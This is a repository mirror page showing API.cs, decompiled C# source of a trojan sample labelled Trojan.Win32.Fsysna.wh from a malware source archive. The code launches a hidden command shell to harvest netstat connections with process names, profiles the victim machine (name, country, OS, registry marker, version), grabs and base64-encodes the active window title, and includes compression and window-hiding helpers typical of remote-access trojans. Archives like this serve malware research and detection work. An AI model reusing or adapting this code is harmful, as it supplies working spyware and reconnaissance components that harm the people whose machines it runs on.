ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-30 22:15:07 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b/API.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

282 lines
9.0 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: n.API
// Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.MyServices;
using n.My;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Text;
namespace n
{
[StandardModule]
internal sealed class API
{
private const uint LOCALE_SYSTEM_DEFAULT = 1024;
private const uint LOCALE_SABBREVCTRYNAME = 7;
public static string fx(ref Array A)
{
string str1;
try
{
foreach (object obj in A)
{
string str2 = Conversions.ToString(obj);
bool flag;
if (Strings.InStr(str2, "Local Address") > 0)
flag = true;
else if (flag)
{
string str3;
if (Operators.CompareString(str2, "", false) == 0)
{
str1 = Strings.Mid(str3, 1, str3.Length - 1);
break;
}
do
{
str2 = Strings.Replace(str2, " ", " ");
}
while (Strings.InStr(str2, " ") > 0);
string[] strArray = Strings.Split(str2);
string str4;
try
{
str4 = Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\")[Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\").Length - 1] + ":" + strArray[5];
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str4 = Process.GetProcessById(Conversions.ToInteger(strArray[5])).ProcessName + ":" + strArray[5];
ProjectData.ClearProjectError();
}
str3 = str3 + str4 + "," + strArray[1] + "," + strArray[2] + "," + strArray[3].ToLower().Replace(MyProject.Computer.Name.ToLower(), "127.0.0.1") + "," + strArray[4] + "!";
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
return str1;
}
public static string Gt()
{
Process process = Process.Start(new ProcessStartInfo()
{
UseShellExecute = false,
RedirectStandardError = true,
RedirectStandardInput = true,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd"
});
process.StandardInput.WriteLine("netstat -o");
process.StandardInput.WriteLine("exit");
StreamReader streamReader = new StreamReader(process.StandardOutput.BaseStream);
Array A = (Array) Strings.Split(process.StandardOutput.ReadToEnd(), "\r\n");
return API.fx(ref A);
}
public static byte[] ZIP(byte[] Byt, ref bool Compress)
{
if (Compress)
{
MemoryStream memoryStream = new MemoryStream();
GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true);
gzipStream.Write(Byt, 0, Byt.Length);
gzipStream.Dispose();
memoryStream.Position = 0L;
byte[] buffer = new byte[(int) memoryStream.Length + 1];
memoryStream.Read(buffer, 0, buffer.Length);
memoryStream.Dispose();
return buffer;
}
MemoryStream memoryStream1 = new MemoryStream(Byt);
GZipStream gzipStream1 = new GZipStream((Stream) memoryStream1, CompressionMode.Decompress);
byte[] buffer1 = new byte[4];
memoryStream1.Position = memoryStream1.Length - 5L;
memoryStream1.Read(buffer1, 0, 4);
int int32 = BitConverter.ToInt32(buffer1, 0);
memoryStream1.Position = 0L;
byte[] array = new byte[int32 - 1 + 1];
gzipStream1.Read(array, 0, int32);
gzipStream1.Dispose();
memoryStream1.Dispose();
return array;
}
public static string FEN(byte[] data) => Convert.ToBase64String(data);
public static byte[] FDE(string base64) => Convert.FromBase64String(base64);
public static string ENB(ref string s) => Convert.ToBase64String(Encoding.UTF8.GetBytes(s));
public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
[DllImport("kernel32.dll")]
private static extern int GetLocaleInfo(
uint Locale,
uint LCType,
[Out] StringBuilder lpLCData,
int cchData);
private static string Gcc(uint lInfo)
{
StringBuilder lpLCData = new StringBuilder(256);
int localeInfo = API.GetLocaleInfo(1024U, lInfo, lpLCData, lpLCData.Capacity);
return localeInfo > 0 ? lpLCData.ToString().Substring(0, localeInfo - 1) : string.Empty;
}
public static string Gc() => API.Gcc(7U);
public static string A0()
{
RegistryProxy registry = MyProject.Computer.Registry;
string str1 = B.PC + "\r\n";
string str2;
try
{
str2 = str1 + API.Gc() + "\r\n";
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str2 = str1 + "X\r\n";
ProjectData.ClearProjectError();
}
string str3;
try
{
str3 = str2 + MyProject.Computer.Info.OSFullName + "\r\n";
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str3 = str2 + "X\r\n";
ProjectData.ClearProjectError();
}
string str4;
try
{
foreach (string valueName in MyProject.Computer.Registry.CurrentUser.GetValueNames())
{
if (Operators.CompareString(valueName, "p", false) == 0)
{
str4 = str3 + "Yes\r\n";
goto label_12;
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
str4 = str3 + "No\r\n";
label_12:
string Expression = str4 + B.ver;
string str5;
try
{
str5 = Strings.Replace(Strings.Replace(Strings.Replace(Expression, "Microsoft", ""), "Windows", "Win").Replace("®", "").Replace("™", ""), " ", " ");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str5 = Expression + "X\r\n";
ProjectData.ClearProjectError();
}
return str5 + "\r\n \r\n ";
}
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID);
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);
[DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowTextLength(long hwnd);
public static string A1(ref bool p)
{
string str1;
try
{
IntPtr foregroundWindow = API.GetForegroundWindow();
if (foregroundWindow == IntPtr.Zero)
{
str1 = "";
}
else
{
int windowTextLength = API.GetWindowTextLength((long) foregroundWindow);
string str2 = Strings.StrDup(windowTextLength + 1, "*");
API.GetWindowText(foregroundWindow, ref str2, windowTextLength + 1);
int lpdwProcessID;
API.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID);
if (lpdwProcessID == 0)
{
str1 = API.ENB(ref str2);
}
else
{
try
{
string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle;
str1 = API.ENB(ref mainWindowTitle);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str1 = API.ENB(ref str2);
ProjectData.ClearProjectError();
}
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str1 = "";
ProjectData.ClearProjectError();
}
return str1;
}
public class wd
{
public const int HIDE = 0;
public const int Normal = 1;
public const int Minimized = 2;
public const int Maximized = 3;
public const int Show = 5;
public const int RESTORE = 9;
public int hWnd;
public static void G(ref int hwd, ref int A) => API.wd.ShowWindow(hwd, A);
[DllImport("User32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
}
}
}
Reference in New Issue View Git Blame Copy Permalink